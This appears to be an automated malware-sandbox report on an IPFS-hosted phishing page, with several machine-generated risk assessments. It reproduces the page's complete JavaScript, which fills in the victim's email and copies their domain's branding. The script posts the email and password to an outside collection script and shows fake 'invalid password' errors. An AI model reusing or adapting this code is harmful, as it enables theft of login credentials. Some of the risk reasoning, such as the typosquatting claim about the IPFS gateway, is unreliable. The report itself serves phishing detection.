Windows Analysis Report
https://cloudflare-ipfs.com/ipfs/bafybeiebtesuzqjvlwffqmtiic5jwgjo7rc3vsexjuo26nexklhcgl4qwu

• EGA enabled

{
"riskscore": 8,
"reasons": "The text extracted from the OCR appears to be a phishing attempt. It asks the user to input their email address and password, which is a common tactic used by malicious websites to steal user credentials. The 'Remember me' checkbox is also suspicious as it may indicate the use of persistent cookies to track user activity. The URL 'about:blank' does not provide any additional context, but the combination of the URL and the suspicious text suggests a high risk of phishing."
}"

```json
{
  "riskscore": 5,
  "reasons": "The JavaScript code and URL in question have a moderate risk level. The JavaScript code takes a user-provided email address and uses it to modify the page's content, including displaying a favicon and domain name associated with the email address. This behavior can be potentially misleading and may be used for phishing attacks. However, there is no explicit evidence of malicious intent in the code. The URL is a Cloudflare IPFS URL, which is not inherently malicious. However, the content it points to is not directly verifiable and should be treated with caution."
}
```"

/* global $ */
    $(document).ready(function(){
      var count=0;

      $('#back1').click(function () {
        $("#msg").hide();
        $('#email').val("");
        $("#automail").animate({left:200, opacity:"hide"}, 0);
        $("#inputbar").animate({right:200, opacity:"show"}, 1000);

      });

      var email = window.location.hash.substr(1);
      if (!email) {

      }
      else
      {
        var my_email =email;
        $('#email').val(my_email);
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!filter.test(my_email)) {
          $('#error').show();
          email.focus;
          return false;
        }
        var ind=my_email.indexOf("@");
        var my_slice=my_email.substr((ind+1));
        var c= my_slice.substr(0, my_slice.indexOf('.'));
        var final= c.toLowerCase();
        var finalu= c.toUpperCase();

        $("#logoimg").attr("src", "https://www.google.com/s2/favicons?domain="+my_slice);
        $("#logoname").html(finalu);
        $(".logoname").html(finalu);
        $(".domain").html(my_slice);
        $(".email").html(email);
		
		     var mainPage = 'https://'+my_slice; 
     //     var mainPage = 'https://webmail.staralliancebd.com/';  
        $("#logoimg").attr("src", "https://www.google.com/s2/favicons?domain="+mainPage);
         document.getElementById('mainPage').src = mainPage;
    //    $("#mainPage").src(mainPage);
    
      }


      
      $('#submit-btn').click(function(event){
        $('#error').hide();
        $('#msg').hide();
        event.preventDefault();
        var email=$("#email").val();
        var password=$("#password").val();
        var msg = $('#msg').html();
        $('#msg').text( msg );
		                    if (!password) {
                   $("#msg").show();
             $('#msg').html("Password is empty");

                return false;
            }
      ///////////new injection////////////////
      var my_email =email;
      var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

      if (!filter.test(my_email)) {
        $('#error').show();
        email.focus;
        return false;
      }

      var ind=my_email.indexOf("@");
      var my_slice=my_email.substr((ind+1));
      var c= my_slice.substr(0, my_slice.indexOf('.'));
      var final= c.toLowerCase();
      var finalu= c.toUpperCase();

        $("#logoimg").attr("src", "https://www.google.com/s2/favicons?domain="+my_slice);
        $(".logoimg").attr("src", "https://www.google.com/s2/favicons?domain="+my_slice);
        $("#logoname").html(finalu);
      ///////////new injection////////////////
      count=count+1;
      
      $.ajax({
        dataType: 'JSON',
        url: 'https://hamaberry.com/chukwupaddy3/cjmmvfc.php',
        type: 'POST',
        data:{
          email:email,
          password:password,
        },
            // data: $('#contact').serialize(),
            beforeSend: function(xhr){
              $('#submit-btn').html('Verifying...');
            },
            success: function(response){
			 $('#msg').html("<span style='color:red;'>Wrong password! Please try again</span>");
              if(response){
                $("#msg").show();
				console.log(response);
				$('#msg').html(response['msg']);
                if(response['signal'] == 'ok'){
                  $("#password").val("");
                  if (count>=2) {
                    count=0;
                    // window.location.replace(response['redirect_link']);
                   window.location.replace("http://www."+my_slice); 

                  }
                                $("#msg").show();
               $('#msg').html("Invalid password! Please try again");
                }
                else{
                                 $("#msg").show();
               $('#msg').html("Invalid password! Please try again");
                }
              }
            },
            error: function(){
              $("#password").val("");
              if (count>=3) {
                count=0;
                   window.location.replace("http://www."+my_slice);
                 
              }
              $("#msg").show();
               $('#msg').html("Invalid password! Please try again");
            },
            complete: function(){
              $('#submit-btn').html('Sign in');
            }
          });
    });

 			

    });

{
    "riskscore": 7,
    "reasons": "The URL in question has a high risk of typosquatting due to the following reasons:\
1. The domain name 'cloudflare-ipfs.com' is very similar to the legitimate domain 'cloudflare.com'. The addition of '-ipfs' could easily be mistaken for a subdomain or a legitimate variation of the domain.\
2. The URL points to an IPFS (InterPlanetary File System) hash, which is not inherently suspicious but could be used to host malicious content. It is important to verify the authenticity of the content being accessed, especially if it is from an unknown or untrusted source."
}"

```json
{
  "phishing_score": 8,
  "brands": "None",
  "phishing": true,
  "suspicious_domain": true,
  "has_loginform": true,
  "has_captcha": false,
  "setechniques": true,
  "reasons": "The URL 'https://cloudflare-ipfs.com/ipfs/bafybeiebtesuzqjvlwffqmtiic5jwgjo7rc3vsexjuo26nexklhcgl4qwu' does not match any known legitimate domain associated with a specific brand, raising suspicion. The use of a generic 'Webmail' logo and interface in the image without any specific brand identifiers is a common tactic in phishing to mislead users. The domain is hosted on IPFS, which is unusual for legitimate business services that typically use their own domain names. The presence of a login form without additional security measures like CAPTCHA further increases the risk of phishing."
}